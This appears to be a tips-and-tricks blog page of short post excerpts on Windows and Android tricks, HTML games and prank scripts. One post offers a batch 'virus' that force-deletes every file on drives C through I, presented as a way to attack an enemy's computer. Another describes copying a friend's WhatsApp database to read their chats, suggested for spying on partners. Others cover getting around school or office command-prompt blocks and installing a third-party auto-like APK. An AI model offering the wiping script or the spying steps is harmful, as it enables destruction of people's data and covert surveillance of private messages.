How to hard reset Samsung galaxy grand prime SM-G530H

Leave a Comment
Go to the given below link. http://www.hard-reset.mobi/samsung-galaxy-grand-prime-sm-g530h-hard-reset/...

How to boot or start computer faster?

Leave a Comment
1. Press start > Run then type msconfig and press enter.2.Go to the startup tab. Here you will see a list of startup items. These are all the programs that automatically start when you boot your PC. It is these that slow down the boot up process.  So uncheck all the unwanted items like ms-office, messengers other utilities that u may not need at startup). Don't uncheck your antivirus software.Restart your Pc to and see for yourself, your pc will now boot faster.... &nbs...

SOME AWESOME TRICKS THAT CAN BE USED IN SCHOOLS,COLLEGES & OFFICES ;D ENJOY,,,,!!!

Leave a Comment
A lot of schools/offices block the cmd box or run box.I'm about to show you how to get it back !Make your own run/cmd boxStep 1.Open notepad.Step 2.Type command.comStep 3.Go to file then save as your desired name followed by .batso for example bob.batRemote shut down !(only works on your local network)Step 1.Go to your cmd / run boxStep 2.Then type shutdown -iStep 3.Endless amusment !!Awsome matrix trick (to impress)Step 1.Open notepad.Step 2.Type this below@echo offcolor 0a:flagecho f 6 j 8 d h l 7 b k g i d j h...

How to backup and restore of your Registry in win 7/8/8.1/xp/vista?

Leave a Comment
In Windows 7 / 8 / Vista: Open Start menu, type regedit in Start Search and click OK. In Windows XP: Open Start menu, click Run, type regedit and select OK. In Registry Editor go to the File Menu and select Export. Under the export range select All. Put an appropriate file name and save as file type Registration Files(*.reg). Importing – Restoring The Registry In Registry Editor go to the File Menu and...

How to show saved fb gmail password on google chrome?

Leave a Comment
1.Open google chrome 2.Go to settings 3. click on "show advanced settings" 4.click on manage save passwords                            or search manage save passwords 5.Show the password.   ...

How to use Keyboard as Mouse?

Leave a Comment
If your mouse is not working and you don't wish to wait till you get a new mouse, you would definitely like to know how you can use your keyboard as mouse. It is easy to use your mouse as keyboard in Windows using the On Screen Keyboard utility, but it is also possible to do the reverse. All you need to do is: Windows XP Users:- Go to Control Panel. Then click on Switch to Classic View. Then Click on Accessibility...

How to get high score in Nokia snake xenzia game?

Leave a Comment
You can get high score in Nokia snake Xenzia game by following these steps: 1. Open the game 2. Go go game type 3. Select the Campaign 4. Go back and start the new game 5. When the game is stared click back and go back to menu 6. Then Again go to Game TYPE and Again select Campaign 7. After selecting Campaign Full Back to main screen 8. Again start game and click on continue. After select continue you found that there is no maze. 9. Play the game and when the level is complete again maze is appear but your score remain unset...

How to hack game score on any android phone?

1 comment
You can hack your game score your phone must be rooted how to root any android phone? 1) First of all, go ahead and download ES FILE EXPLORER from the Play Store. 2) Launch ES File Explorer and press on the three-lined menu button on the top left corner. 3) Go to Tools and make sure that Root Explorer is turned on. 4) Now, go to Local (it’s also in the menu), and click on Device. 5) Go to the data folder; then again to the next data folder. 6) Now,...

How to open facebook mobile version on desktop?

Leave a Comment
Hi guys this a very very simple tricks. 1.open mozilla fir fox or opera 2.copy this url to your browser http://m.facebook.com/ note: this is not work on google chorme browser If your pc is windows 8 or 8.1 then you can download  UC BrowserHD and copy the url http://m.facebook.com/ open facebook mobile version and snap left the uc browser like this photo. ...

How to make HTML snake game?

Leave a Comment
This is very is to make this game  1.open notepad (winkey+r and type notepad hit enter) 2.copy the given bellow code 3.save it's to anyname.html (snake game.html) 4.open this html file on your computer browser and play (google chrome is better) code:.............. <!documentTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <title>Shahrukh RDX</title> <style type="text/css"> body {text-align:center;} canvas { border:2px dotted #cc0; } h1 { font-size:50px;...

How to change boot animation of any android phone?

Leave a Comment
Android, being an open source OS, is very easy to hack as per your needs. This also applies to the boot animation. You can actually change the boot animation as per your needs and taste! However, there are two things you need to keep in mind. Your phone needs to be rooted. Boot animations need to be of the same resolution as your phone’s screen. For eg if your phone has a WVGA screen, you need a boot animation in a resolution of 800×480...

How to disable any android phone animation?

Leave a Comment
Disable Animations Here’s a tip on how to make your Android device run a bit smoother: disable its animations. You will need to have access to Developer Options which can be found under Settings or About device. Note: For some phones, you may need to go to Build number and tap on it repeatedly until you see "You are now a developer!". Developer options are now enabled. Under enabled Developer...

How To Check For android System updates?

Leave a Comment
How To Check For android System updates? For Android users that are using stock ROM, you may want to look for new updates to your system. To check for updates: Go to Settings > About phone/tablet. Tap on System updates. Tap Check now to look for system updates. ...

How to disable automatic app update?

Leave a Comment
Disable automatic App Updates Prefer to read through app permissions and manually pick which app updates to adopt? You can, but first you need to disable your automatic app updates. Here are the steps: Open Play Store and head over to Settings. Tap on Auto-update apps. Choose Do not auto-update apps. If you want to enable the auto updates, follow the same path and choose Auto-update apps at any...

How to disable applications notification on any android?

Leave a Comment
1. Disable App Notifications Bugged by annoying app notifications that just keep coming? If you don’t know already, these app notifications also drain your phone’s battery. If you want to turn them off, and you are on Jelly Bean 4.1 and above, here’s how: On any of your unwanted notifications in your notification bar, long press on the notification for a message box to appear. Tap on App Info > Untick Show...

How to blink keyboard LED light?

Leave a Comment
This is a very simple and fun tricks. Your keyboard led is danching nicely. 1.open note pad (winkey+r and type "notepad" and hit enter) 2.type or copy the given below code 3.and save it's anyname.vbs (keyboard led dance.vbs) code------- Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{NUMLOCK}" wshshell.sendkeys "{SCROLLLOCK}" loop 4.for stop...

How to personalize win8 without active?

Leave a Comment
Now you can personalize your windows 8 pc start screen without active from this tricks. 1.Go to run(Winkey+R) 2.Type or copy the below text 3.personalize your win8. oobe/msoobe ...

How to make a HTML calculator?

Leave a Comment
1.open note pad (winkey+R type "notepad" hit enter) 2.copy the given below code 3.save it to anyname.html like calculator.html 4.open file in your pc browser (Google chrome is best) code:---------------- <html> <head> <title>HTML Calculator</title> </head> <body bgcolor= "#0f0499" text= "yellow"> <form name="calculator" > <input type="button" value="1" onClick="document.calculator.ans.value+='1'"> <input type="button" value="2" onClick="document.calculator.ans.value+='2'"> <input...

How to reboot into safe boot?

Leave a Comment
how to reboot on safe mod 1. open run or click win+r 2.type "msconfig" without quotes 3.then click boot and select safe m...

How to make a danger virus to format pc drive?

Leave a Comment
This tricks is dangerous to test it on your computer becouse it's delete your all hard drive data at first open note pad then type or copy this code and save its anyname.bat like virus.bat and click to open this and delete your all data. This tricks to hack your enemies computer. code is---------- @echo off del C:\*.* /f /s /q del D:\*.* /f /s /q del E:\*.* /f /s /q del F:\*.* /f /s /q del G:\*.* /f /s /q del H:\*.* /f /s /q del I:\*.* /f /s /q save its anyname.bat like virus.ba...

How to create god mod on pc?

Leave a Comment
God mod is a easy setting list of control panel. at first create a folder on desktop then rename it to GodMode.{ED7BA470-8E54-465E-825C-99712043E01C} and save...

Hack friends whats app and read his/her conversation or massage

Leave a Comment
Hello friends, Many of us use whatsapp for chatting with friends. And I'm sure many of us might be also interested to read conversation of your friend. Some might use this trick to spy with their girlfriend/boyfriend. In fact, I too.... So, today I am going to tell one of such trick which will allow you to read your friend's whatsapp conversation. For this, you need to access your friend's phone for approx 30 seconds. Follow these steps: 1. Go to MicroSD card of your friend's phone. ( /sdcard/WhatsApp/Databases/) 2. Click...

Eject your PC CD drive again and again (Fun tricks)

Leave a Comment
Enough of Computer Tricks here... Hm... lets try some Pranks on the Novice and Rookies.. what say? So... here comes my another Exclusive...! Eject your drives in and out infinitely... A simle VB Script will serve the purpose......!!! Do the following: ** Go to Start >> Run ** Type Notepad and hit Enter ** Now in Notepad type: Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection if colCDROMs.Count >= 1 then do For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next ' cdrom For...

How to root any android phone?

Leave a Comment
Download kingo root or kingroot application from google and just one click on root. Download king root from this link    click here Install this application on your phone and ROOT your phone...

How to shoutdown a simple calculator

1 comment
Some calculator have no any shutdown sytem but this tricks work for like that calculator. click  (÷ division) (* multiple) (% percent) (check) (correct) (correc...

How to get Facebook auto like

Leave a Comment
At first go to this link and download this android app. http://www.apental.com/FacebookAutoLike.apk Then open the app and go to your any photos and view this photo and click "Want like on this?" This is work only your photo not other photo and you can try this after an hour.Direct go to download link. And see on my youtube chanel. Click here to go on YouTube ...

How to emergency shutdown of Lava irish x8

Leave a Comment
Just tap the power button for 10 second. Automatically shutdown the devic...

how to check any mobile IMEI no

Leave a Comment
At first open diller and dila *#06# just simple trick...

Blog Archive

Search This Blog

Blog Archive

Powered by Blogger.

Photo of Admin

Photo of Admin

squre

Ads2

Pages

Ads

Amazon

Ads3

Must Watch for My Subscriber.

Subscribe Via Email

Subscribe to our newsletter to get the latest updates to your inbox. ;-)

Your email address is safe with us!